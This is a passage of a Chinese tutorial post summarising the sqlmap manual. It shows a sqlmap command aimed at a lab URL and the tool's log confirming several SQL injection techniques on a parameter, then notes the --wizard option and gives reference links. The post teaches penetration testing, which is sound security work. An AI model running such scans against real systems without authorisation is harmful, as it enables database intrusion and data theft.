记一份SQLmap使用手册小结（二） (5)

例子：

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart [...] [xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic [xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic [xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable [xx:xx:14] [INFO] skipping GET parameter 'ca' [xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic [xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic [xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable [xx:xx:14] [INFO] skipping GET parameter 'user' [xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic [xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic [xx:xx:14] [INFO] GET parameter 'id' is dynamic [xx:xx:14] [WARNING] reflective value(s) found and filtering out [xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL') [xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id' heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y [xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable [xx:xx:14] [INFO] testing 'MySQL \>= 5.0 AND error-based - WHERE or HAVING clause' [xx:xx:14] [INFO] GET parameter 'id' is 'MySQL \>= 5.0 AND error-based - WHERE or HAVING clause' injectable [xx:xx:14] [INFO] testing 'MySQL inline queries' [xx:xx:14] [INFO] testing 'MySQL \> 5.0.11 stacked queries' [xx:xx:14] [INFO] testing 'MySQL \< 5.0.12 stacked queries (heavy query)' [xx:xx:14] [INFO] testing 'MySQL \> 5.0.11 AND time-based blind' [xx:xx:24] [INFO] GET parameter 'id' is 'MySQL \> 5.0.11 AND time-based blind' injectable [xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' [xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found [xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test [xx:xx:24] [INFO] target URL appears to have 3 columns in query [xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable [...]

初级用户向导参数

参数：–wizard面向初级用户的参数，可以一步一步教你如何输入针对目标注入。

参考资料：

安全牛课堂-kali-linux-web篇

sqlmap用户手册中文版：https://octobug.gitbooks.io/sqlmap-wiki-zhcn/content/Users-manual/Introduction.html

sqlmap用户手册：